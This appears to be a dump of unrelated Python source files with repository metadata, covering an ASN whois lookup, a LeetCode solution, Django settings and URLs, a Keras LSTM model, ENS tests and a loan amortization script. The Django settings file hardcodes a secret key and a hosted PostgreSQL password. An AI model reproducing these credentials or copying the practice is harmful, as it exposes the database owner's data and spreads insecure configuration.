_sock.send("%s\r\n" % domain)
_result = ""
while True:
_data = _sock.recv(1024)
if not _data:
break
_result += _data
return _result
def get_AS(AS,IPV4=True,IPV6=True):
## sanitize ASN
_asn = re.search("(?:AS)?(\d{1,10})",AS,re.IGNORECASE)
if not _asn:
return ""
_asn = "AS{0}".format(_asn.group(1))
is6 = ""
if IPV6:
is6 = "[6]?" if IPV4 else "6"
_raw = whois_request("-i origin {0}".format(_asn),"whois.radb.net")
if _raw:
_ips= re.findall("^route{0}:\s+(.*?)$".format(is6),_raw,re.MULTILINE)
return "\n".join(_ips)
return ""
if __name__ == "__main__":
import sys
if len(sys.argv) > 1:
for i in range(1,len(sys.argv)):
AS=sys.argv[i]
print get_AS(AS,IPV6=False)
else:
print "Usage:",sys.argv[0],"as32934"
| [
"[email protected]"
] | |
8bc6d88dd78f78b098e64d97469a50334292230d | 4037275bc34cada84ab026cba27f175d60441816 | /Search/src/problem_417.py | 052dd2ab14b2c82be145449df0f3f6327a546f7b | [
"Apache-2.0"
] | permissive | LihaoWang1991/LeetCode | fe524f0705eb740b0f252cdad33c722c1fbfc9c7 | 391b3beeefe1d32c8a4935a66175ab94445a1160 | refs/heads/master | 2022-11-08T02:25:28.824880 | 2020-06-14T21:18:53 | 2020-06-14T21:18:53 | 271,296,795 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,424 | py | # problem link: https://leetcode.com/problems/pacific-atlantic-water-flow/
class Solution:
def pacificAtlantic(self, matrix: List[List[int]]) -> List[List[int]]:
ans = []
dirs = [[-1,0], [0,-1], [1,0],[0,1]]
num_r = len(matrix)
num_c = len(matrix[0]) if num_r > 0 else 0
can_reach_p = [[False for _ in range(num_c)] for _ in range(num_r)] # mark if one point can reach pacific ocean
can_reach_a = [[False for _ in range(num_c)] for _ in range(num_r)] # mark if one point can reach atlantic ocean
def dfs(r, c, p_or_a):
can_reach = can_reach_p if p_or_a == "p" else can_reach_a
if can_reach[r][c] == True:
return
can_reach[r][c] = True
for [i,j] in dirs:
next_r = r + i
next_c = c + j
if 0<=next_r<num_r and 0<=next_c<num_c and matrix[r][c]<=matrix[next_r][next_c]:
dfs(next_r, next_c, p_or_a)
for r in range(num_r):
dfs(r, 0, "p")
dfs(r, num_c - 1, "a")
for c in range(num_c):
dfs(0, c, "p")
dfs(num_r - 1, c, "a")
for r in range(num_r):
for c in range(num_c):
if can_reach_p[r][c] and can_reach_a[r][c]:
ans.append([r,c])
return ans | [
"[email protected]"
] | |
f90bba74f734eb145a741d2c8e820622f35afabf | ebbfc604cb11337996517c00fc877426b5c2474f | /py/testread.py | be4643ba572e82fae8b83561dc937a79e421aae6 | [] | no_license | SeeTheEveryCornerOfTheWorld/Github_C | d1a689765f81d6d3589bb5f9a4aef79bf841c39e | 3b3713adf45442a1174e4c7cee77c38bacf69ab1 | refs/heads/master | 2022-03-08T20:50:28.570023 | 2022-02-21T05:49:07 | 2022-02-21T05:49:07 | 217,028,180 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 475 | py | #!/usr/bin/env python
import os
import subprocess
#rf =open("/mnt/sharefile-sync/00005_40_172.168.0.175_SMB2/File6.txt",mode='r')
rf = open("/root/readspeed.txt",mode = 'r')
command = "date"
command_ret = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE).communicate()
size =0
while(1):
data=rf.read(10240)
size += len(data)
print("size = %d"%(size))
if(len(data) == 0):
break
print("reading")
print(command_ret)
os.system("date")
| [
"[email protected]"
] | |
25ec7d108b0205b53350fb5e8dad55b960ec5a57 | 462178257804e3be5603b7cf4d2f7ca872730e04 | /rescue_me/urls.py | da494ee2861cd71511da3af03ca401e42511664d | [] | no_license | davincikab/dqrf | ac62a243dd2fb812efbac19e3b2af872032a9214 | b051748b864d75b5fc58f289a4c2a1f17ab4aa81 | refs/heads/master | 2023-03-08T12:35:37.089047 | 2021-02-13T08:19:25 | 2021-02-13T08:19:25 | 318,788,271 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 494 | py | from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('chat/', include('chat.urls')),
path('', include('alerts.urls')),
path('accounts/', include('accounts.urls')),
path('api/v1/', include('api.urls')),
path('api-auth/', include('rest_framework.urls')),
path('api/v1/rest-auth/', include('rest_auth.urls')),
path('api/v1/rest-auth/registration/', include('rest_auth.registration.urls')),
]
| [
"[email protected]"
] | |
42990fc2ef621390f648cebe4f0d3b18aee7ffdb | a6b5156e5445d3eef4c772da47dadf3a0b1d2457 | /api/settings.py | e54d76a0f2189de200dc7681c2ae0df8a12c3696 | [] | no_license | dev-frog/Django_api_ | fff4cecc5b6f26fc6ea23ab6536105ae21580be7 | 1a4b5beda504aef3494709f474ed40340aa9006c | refs/heads/master | 2020-07-22T08:49:46.106808 | 2019-10-14T16:04:47 | 2019-10-14T16:04:47 | 207,138,412 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,347 | py | """
Django settings for api project.
Generated by 'django-admin startproject' using Django 2.1.12.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
import psycopg2
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'tkjk0)!4!ntoj1&iu*urmu&wm5wf)moihjn2cwlz^di^esd+e6'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'core',
'user',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'api.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'api.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'HOST' : 'salt.db.elephantsql.com',
'NAME' : 'sdmikhhi',
'USER' : 'sdmikhhi',
'PASSWORD' : 'WPyBHXZwrbvBTAYAmcYYnFPWlIXU7TSV',
'PORT' :'5432',
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
AUTH_USER_MODEL = 'core.User'
| [
"[email protected]"
] | |
f3aaf829e4a6a9dcfe32371652f033a8319a6c55 | 31063e125fdd4f3987ba4580eb2089a99e5f2fcc | /Components/Widgets/StylizedButton.py | f910e7570605171679ceaf9bd8d8fddcba82813b | [
"MIT"
] | permissive | shell-done/Spongo | 70b2397867837f6bcfac531948cd519d91d119ff | 3492c889b1d60cf50b4b2625b496fd6958309a8e | refs/heads/main | 2023-04-16T07:19:26.483522 | 2021-04-30T23:51:32 | 2021-04-30T23:51:32 | 346,677,492 | 7 | 0 | null | null | null | null | UTF-8 | Python | false | false | 596 | py | from PySide2.QtCore import Qt
from PySide2.QtGui import QColor
from PySide2.QtWidgets import QGraphicsDropShadowEffect, QPushButton
class StylizedButton(QPushButton):
def __init__(self, text: str, object_name: str = "blue"):
super().__init__(text)
self.setCursor(Qt.PointingHandCursor)
if object_name:
self.setObjectName(object_name)
effect = QGraphicsDropShadowEffect(self)
effect.setColor(QColor(0,0,0, 0.25*255))
effect.setOffset(2, 4)
effect.setBlurRadius(4)
self.setGraphicsEffect(effect)
| [
"[email protected]"
] | |
2cc24c8667384b5e9a629eab52a21b76df49b0ce | 38766965a5c6b1e7747ead9495becb1ef3cf5f0f | /Colab_Functions/access_drive.py | 33008795ee8cf63b89e405a370cef30ba348e552 | [] | no_license | mpcrlab/DeepLearningFall2018 | 596c5216e7cfd7263dd59f69badb3a3fd5a0429c | ca2343749fe76f5752f39ca3becd1be9c212c306 | refs/heads/master | 2020-03-26T22:38:29.826402 | 2018-12-12T05:19:54 | 2018-12-12T05:19:54 | 145,475,999 | 7 | 4 | null | null | null | null | UTF-8 | Python | false | false | 112 | py | #Load drive helper and mount
from google.colab import drive
#autherization prompt
drive.mount('/content/drive')
| [
"[email protected]"
] | |
cf514d8bc867ed8c8a0425190fd1809d38f1caaa | 3a59a9e0fe6014b04dd3ab7e352803f8ec112818 | /src/UniTopicModel.py | 26b5d998ac82264ff4e20bf5f879423f43004603 | [] | no_license | owengbs/TopicModel | 05adfe598980c6028431835dd88d028c6390b591 | d9aae7fe95a78c13b177823f349a9dae39e20d97 | refs/heads/master | 2021-01-10T20:30:16.924284 | 2015-07-06T06:09:51 | 2015-07-06T06:09:51 | 38,486,269 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,380 | py | #-*- coding:utf-8 -*-
import math, numpy
import CommonWords
"""
@author: macxin
@contact: [email protected]
@license: GPL
@summary:
ๅไธป้ขๆจกๅ็ฎๆณ๏ผๅ่https://d396qusza40orc.cloudfront.net/textanalytics/lecture_notes/wk2/TM-16-one-topic.pdf
UniTopic็ฎๆณ่่ไธคไธชไธป้ขๅๅธ๏ผ็ฎๆ ไธป้ขๅ่ๆฏไธป้ข
่ๆฏไธป้ข๏ผไธป้ข่ฏๆฅ่ชๅจ็บฟ่ฏญๆๅบ็็ฐไปฃๆฑ่ฏญ่ฏๅ
ธ่ฏ้ข็ป่ฎก๏ผhttp://www.cncorpus.org/Resources.aspx
็ฎๆ ไธป้ข๏ผๅพ
ๅๆ็ไธป้ขๆจกๅ
้ๆบ็ๆๆจกๅ๏ผ่งๅฏๆ ทๆฌ็ๆฏไธช่ฏๆฏ็ป่ฟๅฏนไธคไธชไธป้ข่ฟ่กๆฝๆ ทๅไปๆฏไธชไธป้ขไธญๆฝๆ ท็ฎๆ ่ฏๅฝขๆใๅไธช่ฏๆฅ่ชๅชไธชไธป้ข่งไธบ้ๅ้Z
ๆฑ่งฃ็ฎๆณ๏ผEM๏ผExpectation-Maximization๏ผ
EStep๏ผๅบๅฎไธป้ข่ฏๅๅธ๏ผๆดๆฐZ็้ขๆตๅผ
MStep๏ผๅบๅฎZ๏ผๆไผๅไธป้ข่ฏๅๅธ
ๅฏ่ฐๆด็้ขๅๅๆฐ๏ผ
p_theta_d๏ผ็ฎๆ ไธป้ข็ๆฆ็
p_theta_b๏ผ่ๆฏไธป้ข็ๆฆ็๏ผp_theta_d + p_theta_b = 1๏ผ
่พๅบ๏ผๆๅฐ็ฎๆ ไธป้ข็topไธชไธป้ข่ฏ
'"""
class UniTopicModel():
def __init__(self):
self.word_freq = []
self.word_idx = {}
self.idx_word = {}
self.total_count = 0
self.p_theta_d = 0.5#destination topic
self.p_theta_b = 0.5#background topic
self.epsilon = 1e-30
def _cal_p_z0_g_w(self, wi):
nominator = self.p_theta_d * self.p_w_g_theta_d[wi]
denominator = self.p_theta_d * self.p_w_g_theta_d[wi] + self.p_theta_b * self.p_w_g_theta_b[wi]
if denominator == 0:
denominator = self.epsilon
return nominator / denominator
def _cal_p_w_g_theta_d(self, wi):
nominator = self.word_freq[wi] * self.p_z0_g_w[wi]
denominator = 0
for wj in range(self.feature_size):
denominator += self.word_freq[wj] * self.p_z0_g_w[wj]
if denominator == 0:
denominator = self.epsilon
return nominator / denominator
def likely_hood(self):
result = 0
for i in range(self.feature_size):
logval = self.p_theta_d*self.p_w_g_theta_d[i] + self.p_theta_b*self.p_w_g_theta_b[i]
result += self.word_freq[i] * math.log( logval )
return result
def estep(self):
for i in range(self.feature_size):
self.p_z0_g_w[i] = self._cal_p_z0_g_w(i)
def mstep(self):
for i in range(self.feature_size):
self.p_w_g_theta_d[i] = self._cal_p_w_g_theta_d(i)
def initialize(self):
self.feature_size = len(self.word_idx)
self.p_w_g_theta_d = numpy.zeros(self.feature_size, float)
self.p_w_g_theta_b = numpy.zeros(self.feature_size, float)
self.p_z0_g_w = numpy.zeros(self.feature_size, float)
for i in range(self.feature_size):
word = self.idx_word[i]
self.p_w_g_theta_d[i] = 1.0/self.feature_size
self.p_w_g_theta_b[i] = 1.0/self.feature_size
self.p_w_g_theta_b[i] = CommonWords.commonfreq.freqdict[word] if CommonWords.commonfreq.freqdict.has_key(word) else 1.0/self.feature_size
def dump_topic_word(self):
items = [(i, self.p_w_g_theta_d[i]) for i in range(self.feature_size)]
items_sorted = sorted(items, cmp = lambda x,y:cmp(x[1], y[1]), reverse = True)
for i in range(min(20, len(items_sorted))):
print self.idx_word[items_sorted[i][0]]+" ",
print '\n'
| [
"[email protected]"
] | |
737e686106e62f1541294acb60cd72b3fa44be73 | 2b7a3e8797a5c5bedd9efeae6c6378eac92f6534 | /tests/tests_my_primitive_cover.sage.py | 50f89886f94007d650a3f68d5378857a51bb5ca2 | [] | no_license | madamelo/ParkingFunctions | 5be8b81c63082acafc3ec94a6a9939061c6e7e0b | aa79acea33d7e9b6cf73ec84fccf3724566bba59 | refs/heads/master | 2022-12-19T12:31:01.448137 | 2020-09-06T16:56:10 | 2020-09-06T16:56:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,746 | py |
# This file was *autogenerated* from the file ../tests/tests_my_primitive_cover.sage
from sage.all_cmdline import * # import sage library
_sage_const_1 = Integer(1); _sage_const_3 = Integer(3); _sage_const_4 = Integer(4); _sage_const_5 = Integer(5); _sage_const_7 = Integer(7); _sage_const_6 = Integer(6); _sage_const_2 = Integer(2)
sage.repl.load.load(sage.repl.load.base64.b64decode("Li4vY29kZS9teV9wcmltaXRpdmVfY292ZXIuc2FnZQ=="),globals(),False)
# TESTS MPC
print ("Tests MPC")
L1 = [_sage_const_1 , _sage_const_1 , _sage_const_3 , _sage_const_4 , _sage_const_4 , _sage_const_5 , _sage_const_7 ]
L2 = [_sage_const_1 , _sage_const_1 , _sage_const_3 , _sage_const_4 , _sage_const_4 , _sage_const_6 , _sage_const_7 ]
L3 = [_sage_const_1 , _sage_const_2 , _sage_const_3 , _sage_const_4 , _sage_const_4 , _sage_const_6 , _sage_const_7 ]
L4 = [_sage_const_1 , _sage_const_2 , _sage_const_3 , _sage_const_4 , _sage_const_4 , _sage_const_4 , _sage_const_7 ]
print (my_prim_cov (L1, L2))
print (my_prim_cov (L2, L1))
print (my_prim_cov (L3, L1))
print (my_prim_cov (L3, L2))
print (my_prim_cov (L4, L1))
print ()
D1 = fpp_to_dyck (L1)
D2 = fpp_to_dyck (L2)
D3 = fpp_to_dyck (L3)
D4 = fpp_to_dyck (L4)
print (my_prim_cov_dyck (D1, D2))
print (my_prim_cov_dyck (D2, D1))
print (my_prim_cov_dyck (D3, D1))
print (my_prim_cov_dyck (D3, D2))
print (my_prim_cov_dyck (D4, D1))
print ()
L = list (generate_fpp (_sage_const_7 ))
P1 = Poset ([L, my_prim_cov])
print (len (P1.cover_relations ()))
print (P1.relations_number ())
print ()
L2 = []
for f in L :
L2.append (DyckWord (fpp_to_dyck (f)))
P2 = Poset ([L2, my_prim_cov_dyck])
print (len (P2.cover_relations ()))
print (P2.relations_number ())
print ()
print (num_rel (_sage_const_7 ))
| [
"[email protected]"
] | |
974f1cd94b2f2eb114c6c64c01378ca3c1e007ce | 10d98fecb882d4c84595364f715f4e8b8309a66f | /kws_streaming/models/lstm.py | d459369e48cccd4f93ece10dc9de15a260f6b60a | [
"CC-BY-4.0",
"Apache-2.0"
] | permissive | afcarl/google-research | 51c7b70d176c0d70a5ee31ea1d87590f3d6c6f42 | 320a49f768cea27200044c0d12f394aa6c795feb | refs/heads/master | 2021-12-02T18:36:03.760434 | 2021-09-30T20:59:01 | 2021-09-30T21:07:02 | 156,725,548 | 1 | 0 | Apache-2.0 | 2018-11-08T15:13:53 | 2018-11-08T15:13:52 | null | UTF-8 | Python | false | false | 3,941 | py | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""LSTM with Mel spectrum and fully connected layers."""
from kws_streaming.layers import lstm
from kws_streaming.layers import modes
from kws_streaming.layers import speech_features
from kws_streaming.layers import stream
from kws_streaming.layers.compat import tf
import kws_streaming.models.model_utils as utils
def model_parameters(parser_nn):
"""LSTM model parameters."""
parser_nn.add_argument(
'--lstm_units',
type=str,
default='500',
help='Output space dimensionality of lstm layer ',
)
parser_nn.add_argument(
'--return_sequences',
type=str,
default='0',
help='Whether to return the last output in the output sequence,'
'or the full sequence',
)
parser_nn.add_argument(
'--stateful',
type=int,
default='1',
help='If True, the last state for each sample at index i'
'in a batch will be used as initial state for the sample '
'of index i in the following batch',
)
parser_nn.add_argument(
'--num_proj',
type=str,
default='200',
help='The output dimensionality for the projection matrices.',
)
parser_nn.add_argument(
'--use_peepholes',
type=int,
default='1',
help='True to enable diagonal/peephole connections',
)
parser_nn.add_argument(
'--dropout1',
type=float,
default=0.3,
help='Percentage of data dropped',
)
parser_nn.add_argument(
'--units1',
type=str,
default='',
help='Number of units in the last set of hidden layers',
)
parser_nn.add_argument(
'--act1',
type=str,
default='',
help='Activation function of the last set of hidden layers',
)
def model(flags):
"""LSTM model.
Similar model in papers:
Convolutional Recurrent Neural Networks for Small-Footprint Keyword Spotting
https://arxiv.org/pdf/1703.05390.pdf (with no conv layer)
Model topology is similar with "Hello Edge: Keyword Spotting on
Microcontrollers" https://arxiv.org/pdf/1711.07128.pdf
Args:
flags: data/model parameters
Returns:
Keras model for training
"""
input_audio = tf.keras.layers.Input(
shape=modes.get_input_data_shape(flags, modes.Modes.TRAINING),
batch_size=flags.batch_size)
net = input_audio
if flags.preprocess == 'raw':
# it is a self contained model, user need to feed raw audio only
net = speech_features.SpeechFeatures(
speech_features.SpeechFeatures.get_params(flags))(
net)
for units, return_sequences, num_proj in zip(
utils.parse(flags.lstm_units), utils.parse(flags.return_sequences),
utils.parse(flags.num_proj)):
net = lstm.LSTM(
units=units,
return_sequences=return_sequences,
stateful=flags.stateful,
use_peepholes=flags.use_peepholes,
num_proj=num_proj)(
net)
net = stream.Stream(cell=tf.keras.layers.Flatten())(net)
net = tf.keras.layers.Dropout(rate=flags.dropout1)(net)
for units, activation in zip(
utils.parse(flags.units1), utils.parse(flags.act1)):
net = tf.keras.layers.Dense(units=units, activation=activation)(net)
net = tf.keras.layers.Dense(units=flags.label_count)(net)
if flags.return_softmax:
net = tf.keras.layers.Activation('softmax')(net)
return tf.keras.Model(input_audio, net)
| [
"[email protected]"
] | |
5d729490511e978dc60397debea6f54853c658cc | ae50e3c7577169550d2e27a8c22301114e32e7a3 | /tests/test_setup_name.py | dd8b3e3f97fed71f8fb402b536332791930764b5 | [
"MIT"
] | permissive | carver/ens.py | 7535607588ddbff97e592881cf710137a395e229 | 5f2f70281e19fdd16879427553fa07d451fbc152 | refs/heads/master | 2022-03-09T04:10:38.061362 | 2018-09-17T18:16:10 | 2018-09-17T18:16:10 | 98,133,934 | 41 | 10 | null | 2017-10-03T17:36:34 | 2017-07-24T00:27:34 | Python | UTF-8 | Python | false | false | 3,383 | py |
import pytest
from unittest.mock import Mock
from ens.main import UnauthorizedError, AddressMismatch, UnownedName
'''
API at: https://github.com/carver/ens.py/issues/2
'''
@pytest.fixture
def ens2(ens, mocker, addr1, addr9, hash9):
mocker.patch.object(ens, '_setup_reverse')
mocker.patch.object(ens, 'address', return_value=None)
mocker.patch.object(ens, 'owner', return_value=None)
mocker.patch.object(ens.web3, 'eth', wraps=ens.web3.eth, accounts=[addr1, addr9])
mocker.patch.object(ens, 'setup_address')
'''
mocker.patch.object(ens, '_resolverContract', return_value=Mock())
mocker.patch.object(ens, '_first_owner', wraps=ens._first_owner)
mocker.patch.object(ens, '_claim_ownership', wraps=ens._claim_ownership)
mocker.patch.object(ens, '_set_resolver', wraps=ens._set_resolver)
mocker.patch.object(ens.ens, 'resolver', return_value=None)
mocker.patch.object(ens.ens, 'setAddr', return_value=hash9)
mocker.patch.object(ens.ens, 'setResolver')
mocker.patch.object(ens.ens, 'setSubnodeOwner')
'''
return ens
def test_cannot_set_name_on_mismatch_address(ens2, mocker, name1, addr1, addr2):
mocker.patch.object(ens2, 'address', return_value=addr2)
with pytest.raises(AddressMismatch):
ens2.setup_name(name1, addr1)
def test_setup_name_default_address(ens2, mocker, name1, addr1):
mocker.patch.object(ens2, 'address', return_value=addr1)
ens2.setup_name(name1)
ens2._setup_reverse.assert_called_once_with(name1, addr1, transact={})
def test_setup_name_default_to_owner(ens2, mocker, name1, addr1):
mocker.patch.object(ens2, 'owner', return_value=addr1)
ens2.setup_name(name1)
ens2._setup_reverse.assert_called_once_with(name1, addr1, transact={})
def test_setup_name_unowned_exception(ens2, name1):
with pytest.raises(UnownedName):
ens2.setup_name(name1)
def test_setup_name_unauthorized(ens2, mocker, name1, addr1):
mocker.patch.object(ens2, 'address', return_value=addr1)
mocker.patch.object(ens2.web3, 'eth', wraps=ens2.web3.eth, accounts=[])
with pytest.raises(UnauthorizedError):
ens2.setup_name(name1, addr1)
def test_setup_name_no_resolution(ens2, name1, addr1):
ens2.setup_name(name1, addr1)
ens2._setup_reverse.assert_called_once_with(name1, addr1, transact={})
def test_setup_name_transact_passthrough(ens2, name1, addr1):
transact = {'gasPrice': 1}
ens2.setup_name(name1, addr1, transact=transact)
ens2._setup_reverse.assert_called_once_with(name1, addr1, transact=transact)
def test_setup_name_resolver_setup(ens2, name1, addr1):
# if the name doesn't currently resolve to anything, set it up
transact = {'gasPrice': 1}
ens2.setup_name(name1, addr1, transact=transact)
ens2.setup_address.assert_called_once_with(name1, addr1, transact=transact)
def test_setup_reverse_label_to_fullname(ens, mocker, addr1):
registrar = mocker.patch.object(ens, '_reverse_registrar', return_value=Mock())
ens._setup_reverse('castleanthrax', addr1)
registrar().setName.assert_called_once_with('castleanthrax.eth', transact={'from': addr1})
def test_setup_reverse_dict_unmodified(ens, mocker, addr1):
mocker.patch.object(ens, '_reverse_registrar', return_value=Mock())
transact = {}
ens._setup_reverse('castleanthrax', addr1, transact=transact)
assert transact == {}
| [
"[email protected]"
] | |
c6774283e7dc5b2af73cfe173f9f654e0741ff3f | a5a6fb8850c75a49a78cf7d0601a4423e6c251df | /dev/src/pyscripts/loan_model.py | 30224132555fe1f4a33e402b34cb9a6a8761cf7c | [] | no_license | 4theKnowledge/retirement_simulation | b9d4b2371cb4f879d4fddee23181f98e732c8a87 | 104d3fbc3eac458cc7661eba8e9a2ed3befa4e7a | refs/heads/master | 2023-04-15T01:07:17.206956 | 2021-04-18T00:55:19 | 2021-04-18T00:55:19 | 222,358,880 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,334 | py | """
"""
import pandas as pd
from datetime import date
import numpy as np
from collections import OrderedDict
from dateutil.relativedelta import *
from datetime import datetime, timedelta
import matplotlib.pyplot as plt
from absl import flags
from absl import app
FLAGS = flags.FLAGS
flags.DEFINE_float('loan_amt', 500000, 'Loan amount (principal)')
flags.DEFINE_float('loan_ir', 0.04, 'Interest rate for mortage amortization')
flags.DEFINE_integer('loan_length_yrs', 30, 'Mortgage length')
flags.DEFINE_boolean('var_ir', False, 'Interest rate type - fixed (False) or variable (True)')
flags.DEFINE_string('var_ir_fluct', 'conservative', 'Interest rate fluctuation / behaviour setting')
flags.DEFINE_float('add_payment', 0, 'Additional principal payment above minimum repayment')
flags.DEFINE_integer('pa_payments', 12, 'Number of payments (and compounding events) per annum')
flags.DEFINE_string('loan_start_dt', '01-01-2020', 'Start date of loan')
def amortize(argv, lump_sum=0, lump_sum_dt=None):
init_addl_principal = FLAGS.add_payment
pmt = -round(np.pmt(FLAGS.loan_ir/FLAGS.pa_payments, FLAGS.loan_length_yrs*FLAGS.pa_payments, FLAGS.loan_amt), 2)
# initialize the variables to keep track of the periods and running balances
p = 1
# Init temporary variables with default flag values; this is because we do not want to override the flag values
beg_balance = FLAGS.loan_amt
end_balance = FLAGS.loan_amt
start_date = datetime.strptime(FLAGS.loan_start_dt, "%d-%m-%Y")
if lump_sum_dt:
lump_sum_dt = datetime.strptime(lump_sum_dt, "%d-%m-%Y")
var_ir = FLAGS.var_ir
loan_ir = FLAGS.loan_ir
add_payment = FLAGS.add_payment
loan_amt = FLAGS.loan_amt
while end_balance > 0:
# Fluctuate variable interest...
if var_ir and start_date.month == 6 and loan_ir < 0.06:
# print('Modifying interest rate...')
# Assumes that interest rate changes occur mid-year
if FLAGS.var_ir_fluct == 'chaotic':
loan_ir = loan_ir * np.random.uniform(0.5, 1.5)
if FLAGS.var_ir_fluct == 'aggressive':
loan_ir = loan_ir * np.random.uniform(0.8,1.2)
if FLAGS.var_ir_fluct == 'moderate':
loan_ir = loan_ir * np.random.uniform(0.875,0.125)
if FLAGS.var_ir_fluct == 'conservative':
loan_ir = loan_ir * np.random.uniform(0.95,1.05)
# print(loan_ir)
# Recalculate the interest based on the current balance
interest = round(((loan_ir/FLAGS.pa_payments) * beg_balance), 2)
# Determine payment based on whether or not this period will pay off the loan
pmt = min(pmt, beg_balance + interest)
loan_amt = pmt - interest
# Ensure additional payment gets adjusted if the loan is being paid off.
# If the difference between the beginning balance and principal is < additional payment, reduce additional
# payment to match remaining balance.
# Add lump-sum event (Assumes that payment occurs at month begin)
if start_date == lump_sum_dt:
adhoc_paymnt = min((add_payment + lump_sum), beg_balance - loan_amt)
# print(f'Adhoc - Lump sum payment: ${adhoc_paymnt:0.0f}')
end_balance = beg_balance - (loan_amt + adhoc_paymnt)
else:
FLAGS.add_payment = min(add_payment, beg_balance - loan_amt)
end_balance = beg_balance - (loan_amt + add_payment)
adhoc_paymnt = 0
yield OrderedDict([('Month', start_date),
('Period', p),
('Begin Balance', beg_balance),
('Payment', pmt),
('Principal', FLAGS.loan_amt),
('Interest', interest),
('Interest_Rate', loan_ir),
('Additional_Payment', add_payment),
('Adhoc Payment', adhoc_paymnt),
('End Balance', end_balance)])
if add_payment > (beg_balance - loan_amt):
add_payment = init_addl_principal
# Increment the counter, balance and date
p += 1
start_date += relativedelta(months=1)
beg_balance = end_balance
def amortize_format(df):
"""
Format amortize generator.
"""
df.set_index('Month', inplace=True)
df.index = pd.to_datetime(df.index)
return df
def loan_comparison(argv, df_ls, df_nls):
"""
"""
# Loan payoff time
time_ls = df_ls['Month'].iloc[-1]
time_nls = df_nls['Month'].iloc[-1]
print(f'Time saved on loan: {time_nls.year - time_ls.year} years (Make this more accurate later on...)')
# Interest saved
total_interest_ls = df_ls['Interest'].sum()
total_interest_nls = df_nls['Interest'].sum()
print(f'Interest Saved: ${(total_interest_nls - total_interest_ls):0.0f}')
total_cost_ls = total_interest_ls + FLAGS.loan_amt
total_cost_nls = total_interest_nls + FLAGS.loan_amt
print(f'Total Loan Cost: NLS ${total_cost_nls:0.0f} LS ${total_cost_ls:0.0f}')
def loan_plot(df_ls, df_nls):
"""
"""
fig, axs = plt.subplots(2, 1)
axs[0].scatter(x=df_ls['Month'], y=df_ls['Interest'], color='g')
axs[0].scatter(x=df_nls['Month'], y=df_nls['Interest'], color='r')
axs[0].legend(['Lump Sum', 'No Lump Sum'])
axs[0].set_ylabel('Interest ($)')
axs[0].set_xlabel('Time (Months)')
axs[1].scatter(x=df_ls['Month'], y=df_ls['Interest_Rate'] * 100, color='g')
axs[1].scatter(x=df_nls['Month'], y=df_nls['Interest_Rate'] * 100, color='r')
axs[1].legend(['Lump Sum', 'No Lump Sum'])
axs[1].set_ylim([-10,10])
axs[1].set_ylabel('Interest Rate (%)')
axs[1].set_xlabel('Time (Months)')
fig.tight_layout()
plt.show()
def main(argv):
# Lump Sum (ls)
loan_ls = pd.DataFrame(amortize(argv))
# print(loan_ls.head(25))
# No Lump Sum (nls)
loan_nls = pd.DataFrame(amortize(argv, lump_sum = 200000, lump_sum_dt = '01-06-2022'))
print(loan_nls.head(25))
loan_comparison(argv, loan_ls, loan_nls)
loan_plot(loan_ls, loan_nls)
if __name__ == '__main__':
app.run(main) | [
"[email protected]"
] | |
